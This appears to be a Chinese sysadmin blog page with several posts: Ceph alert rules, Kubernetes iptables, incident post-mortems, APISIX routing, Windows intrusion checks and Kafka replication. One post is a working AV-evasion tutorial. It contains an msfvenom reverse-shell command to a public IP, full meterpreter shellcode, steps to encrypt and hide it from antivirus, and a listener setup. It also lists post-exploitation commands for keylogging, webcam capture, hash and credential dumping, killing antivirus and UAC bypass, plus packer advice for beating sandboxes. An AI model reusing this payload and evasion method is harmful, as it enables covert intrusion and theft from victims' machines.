expr: ceph_pg_total - ceph_pg_active > 0    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: critical    annotations:      description: Some groups are unavailable on {{ $labels.cluster }}. Please check their detailed status and current configuration.      summary: PG UNAVAILABLE [{{ $value }}] on {{ $labels.cluster }}  - alert: Ceph Osd Reweighted    expr: ceph_osd_weight < 1    for: 1h    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: OSD {{ $labels.ceph_daemon}} on cluster {{ $labels.cluster}} was reweighted for too long. Please either create silent or fix that issue      summary: OSD {{ $labels.ceph_daemon }} on {{ $labels.cluster }} reweighted - {{ $value }}  - alert: Disk(s) Near Full    expr: (ceph_osd_stat_bytes_used / ceph_osd_stat_bytes) * 100 > 85    for: 2m    labels:      severity: critical      cluster_name: C2-Ceph-Cluster    annotations:      summary: "Disk(s) Near Full"      description: "This shows how many disks are at or above 85% full. Performance may degrade beyond this threshold on filestore (XFS) backed OSD's."  - alert: Ceph Mon Not Active    expr: ceph_mon_quorum_status == 0    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: ceph_mon_quorum_status Inactive for more than 5 minutes, check the status of the ceph_mon component      summary: CEPH in warning  - alert: Ceph Slow Ops    expr: ceph_health_detail{name="SLOW_OPS"} == 1    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: critical    annotations:      description: ceph slow ops persists for more than 5 minutes, Check the ceph cluster      summary: CEPH in critical  - alert: Ceph Pg Inconsistent    expr: ceph_pg_inconsistent == 1    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: critical    annotations:      description: ceph pg inconsistency persists for more than 5 minutes, check the ceph cluster in time      summary: CEPH in critical  - alert: Ceph Osd Latency High    expr: ceph_osd_apply_latency_ms >= 80    for: 5m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: ceph_osd_apply_latency_ms exceeds 80ms and the duration exceeds 5 minutes, check the osd performance in time. {{ $labels.ceph_daemon}}      summary: Ceph high OSD latency {{ $labels.ceph_daemon }}  - alert: Ceph Read Iops High    #irate 函数用于计算时间序列的瞬时速率，但其在短时间范围内可能不太稳定。因此，我们可以尝试使用 rate 函数进行平均速率计算，并设置一个较短的时间范围。    expr: sum(round(rate(ceph_osd_op_r[1m]))) by (instance) > 5000    for: 2m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: ceph_osd_op_r  the cluster IOPS exceeds 5000 for more than 2 minutes, check whether the cluster performance is abnormal      summary: ceph osd has high read IOPS  - alert: Ceph Write Iops High    expr: sum(round(rate(ceph_osd_op_w[1m]))) by (instance) > 3000    for: 2m    labels:      cluster_name: C2-Ceph-Cluster      severity: warning    annotations:      description: ceph_osd_op_w  the cluster IOPS exceeds 3000 for more than 2 minutes, check whether the cluster performance is abnormal      summary: ceph osd has high write IOPS

随便把监控规则调低测试告警信息

shellcode混淆rc4加密生成exe免杀火绒

2024-05-14T23:00:40+08:00

MSF生成C语言的payload或者使用cobalt strike生成也是一样的

Cobalt Strike生成方法

MSF生成方法

msfvenom -p windows/meterpreter/reverse_tcp lhost=42.194.xx.xx（内网穿透的公网IP地址）  lport=7777 -f c#复制payload并整理成同1行\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x31\xff\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b\x42\x3c\x57\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x01\xd3\x50\x8b\x48\x18\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x2a\xc2\x85\xa8\x68\x02\x00\x1e\x61\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5

打开Visual Stuido编辑代码，复制payload进去

源代码不方便提供，自行查找

使用debug模式在线运行，弹出cmd窗口后，复制最下面那段加密过的payload

//然后加上隐藏窗口的代码#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )#pragma comment(linker, "/INCREMENTAL:NO")

切换成Release生成解决方案

MSF开启监听，等待有缘人执行程序上线

msfconsole#载入multi/handler模块use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 0.0.0.0set LPORT 7777run

执行exe无弹窗无感知，隐藏在后台运行

后渗透常用命令

ID	Command	Description
1	upload	传文件到靶机
2	download	从靶机下载文件
3	screenshot	截图（Windows）
4	keyscan_start	启动键盘记录(Windows)
5	keyscan_dump	导出键盘(Windows)
6	keyscan_stop	停止键盘记录(Windows)

#Windows的一些命令查看进程：ps查看当前进程号：getpid查看系统信息：sysinfo查看目标机是否为虚拟机：run post/windows/gather/checkvm查看完整网络设置：route查看当前权限：getuid自动提权：getsystem关闭杀毒软件：run post/windows/manage/killav启动远程桌面协议：run post/windows/manage/enable_rdp列举当前登录的用户：run post/windows/gather/enum_logged_on_users查看当前应用程序：run post/windows/gather/enum_applications抓取目标机的屏幕截图：load espia 或 screengrab获取相机设备：webcam_list控制拍照 ：webcam_snap直播摄像头：webcam_stream控制录音：record_mic查看当前处于目标机的那个目录：pwd查看当前目录：getlwd导出当前用户密码哈希  run hashdump用户名：SID：LM哈希：NTLM哈希:::也可以使用下面这个命令导出权限更高   run windows/gather/smart_hashdump抓取自动登录的用户名和密码  run windows/gather/credentials/windows_autologin直接获取明文密码（注意这个功能需要获取系统权限  获取系统权限需要输入getsystem）首选终端输入  load kiwi    加载kiwicreds_all：列举所有凭据creds_kerberos：列举所有kerberos凭据creds_msv：列举所有msv凭据creds_ssp：列举所有ssp凭据creds_tspkg：列举所有tspkg凭据creds_wdigest：列举所有wdigest凭据dcsync：通过DCSync检索用户帐户信息dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create：创建黄金票据kerberos_ticket_list：列举kerberos票据kerberos_ticket_purge：清除kerberos票据kerberos_ticket_use：使用kerberos票据kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令lsa_dump_sam：dump出lsa的SAMlsa_dump_secrets：dump出lsa的密文password_change：修改密码wifi_list：列出当前用户的wifi配置文件wifi_list_shared：列出共享wifi配置文件/编码#文件系统命令cat c:\boot.ini#查看文件内容,文件必须存在del c:\boot.ini #删除指定的文件upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上，如upload  setup.exe C:\\windows\\system32download nimeia.txt /root/Desktop/   # 下载文件到本机上如：download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/edit c:\boot.ini  # 编辑文件getlwd#打印本地目录getwd#打印工作目录lcd#更改本地目录ls#列出在当前目录中的文件列表lpwd#打印本地目录pwd#输出工作目录cd c:\\ #进入目录文件下rm file #删除文件mkdir dier #在受害者系统上的创建目录rmdir#受害者系统上删除目录dir#列出目标主机的文件和文件夹信息mv#修改目标主机上的文件名search -d d:\\www -f web.config #search 文件，如search  -d c:\\ -f*.docsearch -f autoexec.bat  #搜索文件search -f sea*.bat c:\\xamp\\enumdesktops   #用户登录数

后渗透提权

自动提权，不建议。会被火绒动态查杀！

方法一、 meterpreter中输入：getsystem

方法二、使用msf模块提权

要想提权必须是已经拿到meterpreter 然后将当前meterpreter 后台 meterprerer中输入

background

1、查看可用模块 MSF终端中输入 search bypassuac 查看提权模块

2、选择一个适合当前系统的提权模块我这边使用的是win10系统

#尝试提权use  exploit/windows/local/bypassuac_windows_store_reg#这个模块不行就换一个 use exploit/windows/local/bypassuac_sluihijack#或者 use exploit/windows/local/bypassuac_dotnet_profiler

3 配置模块使用参数终端内输入

show options

4 可以看到需要配置 session 终端内输入

set session {需要提权的session id}#执行提权终端内输入run

5 获取到meterpreter后我们在终端内输入getuid 看实际还没有提权成功需要在还终端内在输入 getsystem 获取权限

6 获取权限完成后输入getuid 即可看到已经获取到SYSTEM 最高权限了

下面是Cobalt Strike效果和查杀率

局域网和CDN防溯源拉黑、HTTPS防数据特征，建议使用Cobalt Strike，可视化更强。

如果是frp内网穿透的转发方式，数据传输转发会有问题，有些功能无法使用，建议使用MSF

微步沙箱通过率1/25

https://s.threatbook.com/

virustotal通过率22/72

https://www.virustotal.com/

注意，不能使用常规开源的加壳工具，列如：UPX这些，由于被公开大多数人已使用，其方法已经不管用，更容易被沙箱杀软检测出来，甚至可以溯源到目标IP地址。

加了UPX壳，直接被分析出来。由于市面上的加壳工具都被大部分人使用，所以其特征容易被杀毒软件判定为木马或误杀，而且会上传样本到沙箱环境进行分析判断，更容易识别特征，即使做了防沙箱，防反调试，防反编译，还是能够被杀软识别特征。所以冷门的可用方法极少，而且无法寻找答案，需要自行摸索。目前有机会免杀的方法是，纯汇编语言+花指令打乱逻辑+付费版加壳，由于纯汇编看不懂，这里并未深入验证过，只知其方法。

没加UPX壳时，反而无法溯源分析出来

Kubernetes1.26.7-iptables数据转发链路刨析

2024-04-21T21:27:48+08:00

RKE-Kubernetes-1.26.7版本默认是使用iptables，NodePort端口不会在节点暴露出来

刨析数据转发路径：

1、集群外机器192.168.109.x根据路由规则将数据包发送到pod所在机器172.18.7.15

https://172.18.7.15:32000

2、数据包进入了pod所在的机器，所以k8s对该机器nat表的PREROUTING链做规则。链时指出报文要经过KUBE-SERVICES。

#worker节点查看PREROUTING链iptables -n -t nat -L PREROUTING

3、把数据包转到KUBE-SERVICES这个链之后，因为是通过nodeport访问的，所有没有匹配到clusterIP，然后转到KUBE-NODEPORTS链上。

#查看KUBE-SERVICES这条链iptables -n -t nat -L KUBE-SERVICES

4、KUBE-NODEPORTS还是将数据包转到KUBE-SVC-7CMV4UXPSLUSNNV3上，打上标签。再转到KUBE-EXT-7CMV4UXPSLUSNNV3链中，DNAT转换。

KUBE-NODEPORTS#查看KUBE-NODEPORTS这条链ptables -n -t nat -L KUBE-NODEPORTS

Kubernetes在处理流量时，根据连接跟踪信息来确定流量的状态和方向。它可以判断流量是一个新的连接，还是一个已经建立的连接的数据包。

当流量到达KUBE-NODEPORTS链时，Kubernetes会根据目标端口和连接跟踪信息来查找到对应的服务。在这个例子中，Kubernetes会查找名为rancher-nodeport的cattle-system命名空间中的服务。

接下来，Kubernetes使用服务的选择器来查找与该服务相关联的Pod。选择器是一组标签，用于标识Pod所属的服务。

根据选择器找到的Pod，Kubernetes会使用kube-proxy来进行流量转发。kube-proxy是在每个节点上运行的一个组件，它负责监听服务和Pod的变化，并根据这些变化更新iptables规则。

kube-proxy使用iptables规则来将流量转发到具体的Pod

Windows获取设备当前定位坐标—精确街道

2024-04-14T23:24:21+08:00

使用powershell执行下面代码

Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object$GeoWatcher.Start() #Begin resolving current locatonwhile (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {    Start-Sleep -Milliseconds 100 #Wait for discovery.}  if ($GeoWatcher.Permission -eq 'Denied'){    Write-Error 'Access Denied for Location Information'} else {    $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.}

获取到设备定位坐标

如果设备没开定位，那么会获取失败，会报错

坐标反查工具：

https://map.jiqrxx.com/jingweidu/

https://www.lddgo.net/convert/position

https://www.qvdv.net/tools/qvdv-coordinate.html

坐标反查效果

反查是为了溯源反制做铺垫

Kubernetes POD Unknown状态，节点失联引起微服务调用异常

2024-03-30T20:58:25+08:00

Kubernetes POD Unknown状态，节点失联引起微服务调用异常

初步分析：

1，从前端日志分析，请求已经流转到后端api网关，api网关上打印出{“code”:500,“message”:“Internal Server Error”,“traceId”:“ITLM4RE5-2419162-31983086”}"}。依此信息可以推断出响应该请求的后端服务出现异常。

2，检查对应的工作负载，发现有部分pod呈现Unkno状态。注意当前共有4个pod，3个正常，1个Unknow，其中Unknow的ip为：10.42.7.247。

3，检查Nacos服务，注意注册服务有4个，与上面工作负载完全对应上。注意IP为10.42.7.247的节点对应pod状态为Unknow。

到此处，初步判断为k8s某个工作节点出现失联，导致网络不通。k8s问题转交甲方运维处理，改故障以得到解决。

根源分析：

A.从服务发现的原理分析，

后端微服务（服务提供方）按照15s/次的频率向nacos发送包括ip，端口等信息的心跳包，nacos如果超过30s（默认两个心跳周期）没有收取心跳就会删除这个pod实例。
1. 网关（服务的调用方）从服务列表上获取一个ip，然后发起调用。

由于ip为10.42.7.247这个POD一直存在与Nacos服务列表上，可以推断出该pod节点一直正常的往nacos发送心跳，并维持的正常的服务运行。反之pod异常则导致心跳异常，naocs会在30s后删除该故障pod。

根据网关打印的日志可以推断出，pod服务正常，但是调用链路不通。再联想起rancher集群出现工作节点失联，怀疑失联节点只是如Rancher控制节点网络中断，失联工作节点上的服务依然正常运行。

B.再次分析k8s网络情况，正常情况下，所有的pod节点均在rancher网络内部，nacos独立于rancher网络。

推测失联情况下网络，失联的工作节点上的全部pod均与rancher网络断开，并且本应该驱散的pod，实际上还在正常运行，并且正常的正常的向nacos发送心跳包。

Pod 一直处于 Unknown 状态，通常是节点失联，没有上报状态给 apiserver，到达阀值后 controller-manager 认为节点失联，而k8s不会因为节点失联而删除其上正在运行的 Pod，而是将其标记为 Terminating 或 Unknown 状态。

可能原因:

节点高负载导致无法上报
节点宕机
节点被关机
网络不通

根治措施

由运维负责处理基础rancher的基础设施稳定性，保证工作节点稳定不适量，或者失联后能够正常的驱散pod节点，销毁失联工作节点上所有微服务。
迁移nacos注册中心到rancher集群，使得nacos服务同在rancher网络内部。所有服务注册使用rancher内部通信。
检查集群网络插件是否异常
适当调整kubelet参数： node-status-update-frequency: 10s (默认 10s) 达到该阀值后，controller-manager 认为节点失联
如果pod状态长时间没有恢复，则需要手动删除Unknown状态的pod
更换集群部署方式

exe反汇编对比加壳两者区别

2024-03-10T21:28:27+08:00

Virbox Protector试用版，商业版需付费。此效果较好-推荐

https://shell.virbox.com/down.html?keyword=&referrer=https%253A%252F%252Fcn.bing.com%252F&chatpage=https%253A%252F%252Fshell.virbox.com%252Fapply.html&landingPage=https%253A%252F%252Fshell.virbox.com%252F

Shielden加壳

沙箱分析通过率2/27

反汇编对比两者区别

未加壳

已加壳

多了很多代码，就是要打乱逻辑，扰乱特征，目的为了绕过杀软

更高级的玩法是纯汇编，加壳加花指令扰乱，修改特征

Ceph容量暴增、IO性能用尽、OSD超90%排查过程与总结（此文有gif加载时间较长，耐心等待）

2024-02-24T20:05:15+08:00

前因后果

从18:30开始就已经出现了告警，osd磁盘超85%、osd提交延迟超过80ms，然后查看了集群状态，是缓存层比较使用的容量较多，所以缓存层的osd使用量超85%，然后执行了刷盘操作，只需耐心等待数据落盘到后端osd存储即可，然后就没管它了。直到21:00后还发现持续有告警，发现不太对劲，再去查看集群状态，发现osd使用量还在增长，osd数量也在增长，存储池一直有大量读写，然后顺藤摸瓜找到该池所被使用的PVE，最终发现是调用PVE接口有持续的并发克隆操作导致

解决过程

手动在PVE停止克隆并删除释放资源，发现还会循环的调用克隆操作，可以判断是有程序在调用PVE接口。两个怀疑点，一是否被入侵刷接口搞破坏，二是否后端代码调用导致。
直接限制该存储池配额上限为10T实际容量，3副本为30T，所以43T超出配额，该池会无法写入，VM操作系统Hang住、read-only，等解除配额后会恢复，另外IO高也会导致这种情况，所以性能、状态、重要信息监控非常重要。此限制操作是为了避免牵连其它存储池，所有项目环境一锅端就GG了。
由于限制了，所以Ceph暂时得到缓解，此时已经快凌晨1点，本想着休息睡觉第二天反馈给项目组检查代码逻辑流程，但找不出原因又不甘心睡不着，然后继续定位问题。先是查看PVE操作系统内核日志、进程等，找是否有异常问题，发现并无异常。然后查看了PVE访问日志，发现了2个集群的K8S节点一直在POST刷接口克隆操作，随后到K8S集群找到了罪魁祸首，停掉之后立马恢复。此时凌晨3点，上床睡觉。
第二天反馈给项目组，随后bug解决修复。原因是旧的脏数据导致，正常克隆完成后，会去修改对应数据状态为已克隆，现在因为脏数据的存在，导致正常克隆后没有修改数据的状态为已克隆，所以就一直去重复克隆，将对应数据清除恢复。

解决方案

检查业务流程是否需要优化
避免/禁止使用root账户调用PVE
避免/禁止调用PVE大批量并发克隆
避免/禁止只会克隆，而不会删除/释放VM或磁盘。用完就释放，避免造成浪费
测试环境系统盘无特殊需求，尽量使用40G以下。目前80G系统盘的VM数量较多，需调整系统盘大小，避免浪费存储空间

总结

监控重要性：假设没有监控，第二天睡醒，Ceph存储全爆了，部分项目和内部功能测试环境、性能压测环境的VM都会受影响，内核Read-only。这就会拖慢部分项目的开发进度、测试进度。
运维响应积极性
敏锐判断力
如果是生产环境业务快速增长，那么正确的做法是立马上架服务器，横向扩容，尽量低成本实现高性能。尽可能既要又要

CI/CD流程APISIX实现Nexus和Harbor读写分离

2024-01-27T13:38:48+08:00

以下读写分离只用于CI/CD，提高构建效率

Nexus读写分离：

Harbor读写分离：

链路图：

由于Haproxy的4层转发参数无法生效，这里改用为nginx 7层转发

解读：

CI/CD基于gitlab-runner派生POD，即docker in docker模式形成

首先CI构建的时候，会去Nexus仓库拉取构建依赖，Nexus再代理Harbor拉取镜像，也代理了Maven、NPM、Go等等仓库。

apisix是部署在K8S集群的deployment类型，暴露nodeport端口，并没有替换成集群的ingress。

所以构建时，客户端流量进入nginx 7层代理，代理池是worker节点的apisix-nodeport，配上xff透传客户端真实IP，此时apisix配置好路由规则，通过POST、GET实现读写分离，路由规则使用hash算法，通过客户端真实IP进行会话保持，因为harbor、nexus有认证的步骤，避免认证成功后，又访问到了第二个节点，导致重复认证无限循环，一会成功一会失败。然后harbor进行双向同步，即使不做同步也没关系，只要其中1个harbor仓库有基础镜像，那么nexus代理拉取的时候会有优先级，harbor-0没有基础镜像，则会自动去harbor-1拉取。当然，harbor做好双向同步又能提高了效率，然后有些需要拉取公共镜像的，在harbor配上proxy代理走海外线路。nexus也是如此，nexus可以代理后端各种仓库，只要nexus拉取到了就能缓存下来，这时即使后端的仓库故障了，起码暂时不会影响CI/CD的可用性。

1.配置前端apisix转发：

这里需要注意的是，apisix要配置https证书。

apisix里面配置证书，走nodeport进入集群，或者ingress进入。

2.修改apisix日志格式，透传客户端真实IP

日志添加x_forwarded_for

    logs:      # -- Enable access log or not, default true      enableAccessLog: true      # -- Access log path      accessLog: "/dev/stdout"      # -- Access log format      accessLogFormat: '$remote_addr $proxy_add_x_forwarded_for [$time_local] $http_host \"$request\" $status $body_bytes_sent $request_time \"$http_referer\" \"$http_user_agent\" $upstream_addr $upstream_status $upstream_response_time \"$upstream_scheme://$upstream_host$upstream_uri\"'      # -- Allows setting json or default characters escaping in variables      #accessLogFormatEscape: default      accessLogFormatEscape: json      # -- Error log path      errorLog: "/dev/stderr"      # -- Error log level      errorLogLevel: "warn"

修改apisix配置文件，http模块添加:

underscores_in_headers: “on”

real_ip_header: “X-Forwarded-For”

real_ip_recursive: “on”

3.apisix配置路由规则并测试

1.添加上游的服务

选择哈希算法，哈希位置是header头部，key填写x_forwarded_for，上游类型选择节点，然后目标节点选择IP+端口或者K8S集群内部的解析格式，节点这里选择2个，1个是读的节点，1个是写的节点，重点Host请求头需要选择保持与客户端请求一致的主机名！

2.创建一个service服务

选择上游的服务，然后保存

3.然后添加路由规则

绑定服务选择刚才的上游那些节点，路径可以自定义，HTTP方法是所有都选上，然后选择刚才添加的上游服务，一定要注意添加2个读节点和写节点！

Harbor的路由规则案例：

然后apisix配上harbor主备的路由规则，配置方法跟上面的一样！

Windows入侵排查流程

2024-01-13T19:21:35+08:00

Windows入侵排查流程

一. 检查系统账号安全

1、查看服务器是否有弱口令，远程管理端口是否对公网开放。

检查方法：据实际情况咨询相关服务器管理员。

2、查看服务器是否存在可疑账号、新增账号。

检查方法：Win + R，输入 lusrmgr.msc ，查看是否有新增/可疑的账号，如有管理员群组的（Administrators）里的新增账户，如有，请立即禁用或删除掉。
查看当前登录账户，打开cmd窗口，输入query user 命令

3、查看服务器是否存在隐藏账号、克隆账号。

检查方法：
a、Win+R输入regedit，打开注册表，查看管理员对应键值。
- 需要给当前用户授权，否则下面D盾无法读取注册表
b、使用D盾_web查杀工具，集成了对克隆账号检测的功能。
- 先下载工具：https://www.d99net.net/down/d_safe_2.1.8.1.zip
- 直接解压打开exe程序，找到工具栏里的克隆检测

4、结合Windows日志，查看管理员登录时间、用户名是否存在异常。

检查方法：

a、下载LogParser工具（默认安装在C:\Program Files (x86)\Log Parser 2.2）：https://www.microsoft.com/en-us/download/confirmation.aspx?id=24659

b、使用工具查询用户登录情况

Windows日志介绍：

系统日志

记录操作系统组件产生的事件，主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。默认位置： %SystemRoot%\System32\Winevt\Logs\System.evtx

应用程序日志

包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件，例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况，那么我们可以从程序事件日志中找到相应的记录，也许会有助于你解决问题。 默认位置：%SystemRoot%\System32\Winevt\Logs\Application.evtx

安全日志

记录系统的安全审计事件，包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认设置下，安全性日志是关闭的，管理员可以使用组策略来启动安全性日志，或者在注册表中设置审核策略，以便当安全性日志满后使系统停止响应。默认位置：%SystemRoot%\System32\Winevt\Logs\Security.evtx

#手动把windows的应用程序日志、安全日志、系统日志分别复制到桌面进入文件夹 C:\Windows\System32\winevt\Logs Application.evtxSecurity.evtxSystem.evtx#使用Log Parser分析日志，#打开cmd窗口，进入LogParser安装目录cd C:\Program Files (x86)\Log Parser 2.2

登录成功的所有事件

#注意：下面的日志路径需自行修改为桌面的日志路径LogParser.exe -i:EVT –o:DATAGRID  "SELECT *  FROM D:\Desktop\Security.evtx where EventID=4624"#然后会弹窗如下表格

提取登录成功的用户名和IP

LogParser.exe -i:EVT  –o:DATAGRID  "SELECT EXTRACT_TOKEN(Message,13,' ') as EventType,TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as Username,EXTRACT_TOKEN(Message,38,' ') as Loginip FROM D:\Desktop\Security.evtx where EventID=4624"

登录失败的所有事件

LogParser.exe -i:EVT -o:DATAGRID  "SELECT *  FROM D:\Desktop\Security.evtx where EventID=4625"

查询系统日志信息

LogParser.exe -i:evt -o:DATAGRID "select TimeGenerated,TimeWritten,EventType,Strings from D:\Desktop\System.evtx"

二. 检查异常端口、进程

1、检查端口连接情况，是否有远程连接、可疑连接。

检查方法：
a、打开cmd窗口，使用netstat -ano | findstr "ESTABLISHED" 命令查看目前的网络连接，定位可疑的 ESTABLISHED
ESTABLISHED状态是建立连接，表示两台机器正在通信。
b、根据 netstat 命令定位出的 PID 编号，再通过 tasklist 命令进行进程定位 tasklist | findstr "输入PID号"

2、进程

检查方法：
a、输入 msinfo32 命令，依次点击 “软件环境 – 正在运行任务” 就可以查看到进程的详细信息，比如进程路径、进程ID、文件创建日期以及启动时间等。
b、打开D盾_web查杀工具，进程查看，关注没有签名信息的进程。
查看可疑的进程及其子进程。可以通过观察以下内容：
```
没有签名验证信息的进程没有描述信息的进程进程的属主进程的路径是否合法CPU或内存资源占用长时间过高的进程
```

三. 检查启动项、计划任务、服务

1、检查服务器是否有异常的启动项。

检查方法：
a、单击【开始】>【所有程序】>【启动】，默认情况下此目录在是一个空目录，确认是否有非业务程序在该目录下。
b、Win+R，输入 msconfig，查看是否存在命名异常的启动项目，是则取消勾选命名异常的启动项目，并到命令中显示的路径删除文件。
c、Win+R，输入 regedit，打开注册表，查看开机启动项是否正常，特别注意如下三个注册表项：
```
#分别进入下面3个注册表检查右侧是否有启动异常的项目，如有异常项目请删除，并建议安装杀毒软件进行病毒查杀，清除残留病毒或木马。HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\runHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce
```
d、D盾查看启动项是否有异常，工具栏里选择启动项

2、检查服务自启动是否有异常的服务

检查方法：
a、Win+R，输入services.msc，注意服务状态和启动类型，检查是否有异常服务。

3、打开计划任务，查看有无异常任务

检查方法：
a、Win+R，输入taskschd.msc，检查是否存在异常计划任务

Kafka异地灾备—MirrorMaker2跨机房复制

2023-12-30T19:18:56+08:00

背景

业务系统要做同城多机房灾备架构，机房A挂了后，流量转到机房B，但kafka的数据，如何在A和B两个机房共用。

方案选型与架构

kafka官网相关介绍：https://kafka.apache.org/documentation/#georeplication-best-practice
中文翻译文档：https://kafka.apachecn.org/6/#_24

因为kafka 的mirror-maker2 新增了诸多特性，如权限同步，消费者组offset同步，动态同步topic与group信息，同步速度高的情况；所以使用mirror-maker2 来进行存量与增量同步；

在调研测试中发现当前使用的kafka2.7版本并不支持topic迁移后保持完全一样;在kafka3.0 版本的mirror-maker2 增加了支持topic单向不带前缀同步的功能；

了解到mm1有一个缺陷，因为mm1备份数据的时候，源集群和目标集群的topic名称都是一样的，所以可能出现两个集群的消息无限递归的情况（就是两个名称相同的topic，一条消息a传b，b再传a，循环往复）。mm2解决了这个缺陷，采用了给topic加一个前缀的方式，如果是两个集群相互备份，那么有前缀的topic的消息，是不会备份的。但是也可以把topic前缀去掉，但这只能单向同步。

mm1配置信息和topic acl相关的信息是不会同步的，这会给集群管理带来一定的困难，所以mm2解决了这个问题，即源集群的配置和acl都会自动同步到目标集群中。

原理图：

mirror-maker2内部topic设计

mm2会在kafka生成多个内部topic ，来存储源集群topic相关的状态和配置信息，以及维持心跳。主要有三个内部topic：

hearbeat topic
checkpoints topic
offset sync topic

heartbeat topic

在默认的配置中，源集群和目标集群都会有一个用于发送心跳的topic，consumer 客户端通过这个 topic，一方面可以确认当前的 connector 是否存活，另一方面确认源集群是否处于可用状态。

heartbeat topic的schema如下：

target cluster：接收心跳集群
source cluster：发送心跳的集群
timestamp：时间戳

checkpoints topic

对应的connector（即MirrorCheckpointConnector）会定期向目标集群发送checkpoint信息，主要是consumer group提交的offset ，以及相关辅助信息。

checkpoints topic 的schema如下：

consumer group id (String)
topic (String) ：包含源集群和目标集群的 topic
partition (int)
upstream offset (int): 源集群指定consumer group已提交的offset（latest committed offset in source cluster）
downstream offset (int): 目标集群已同步的offset（latest committed offset translated to target cluster）
metadata (String)：partition元数据
timestamp

mm2提供的另一个功能，consumer切换集群消费就是通过这个topic实现的。因为这个topic中存放了源集群consumer group的消费offset，在某些场景（比如源集群故障）下要切换consumer到目标集群，就可以通过这个topic获取消费offset然后继续消费。

offset sync topic

这个topic ，主要是在两个集群间同步topic partition的offset。这里的offset并不是consumer的offset，而是日志的offset。

它的 schema 如下：

topic (String)：topic 名
partition (int)
upstream offset (int)：源集群的 offset
downstream offset (int)：目标集群的 offset，和源集群的应该保持一致

config sync topic

mm2会将源集群的数据同步到目标集群，那么目标集群对应的topic的读写权限上怎样的呢？mm2约定了，目标集群对应的topic（源集群备份的那个）只有source和sink connector能够写入。为了实施此策略，MM2使用以下规则将 ACL 策略传播到下游主题：

若用户对源集群的topic有read的权限，那么对目标集群对应的topic也有read的权限
除了mm2，别的用户都不能写入目标集群对应的topic，同时会同步topic相关配置信息

约束与限制

源集群中节点的IP地址和端口号不能和目标集群中节点的IP地址和端口号相同，否则会导致数据在Topic内无限循环复制。
使用MirrorMaker同步数据，至少需要有两个或以上集群，不可在单个集群内部使用MirrorMaker，否则会导致数据在Topic内无限循环复制。
mm2和mm1一样，在最简单的主从备份场景中，mm2建议部署在目标（target）集群，即从远端消费然后本地写入。如果部署在源集群端，那么出错的时候可能会出现丢数据的情况。

MM2异地复制概述

Kafka 管理员可以定义跨越各个 Kafka 集群、数据中心或地理区域边界的数据流。组织、技术或法律要求通常需要此类事件流设置。常见场景包括：

异地复制
灾难恢复
将边缘集群馈送到中央聚合集群
集群的物理隔离（例如生产与测试）
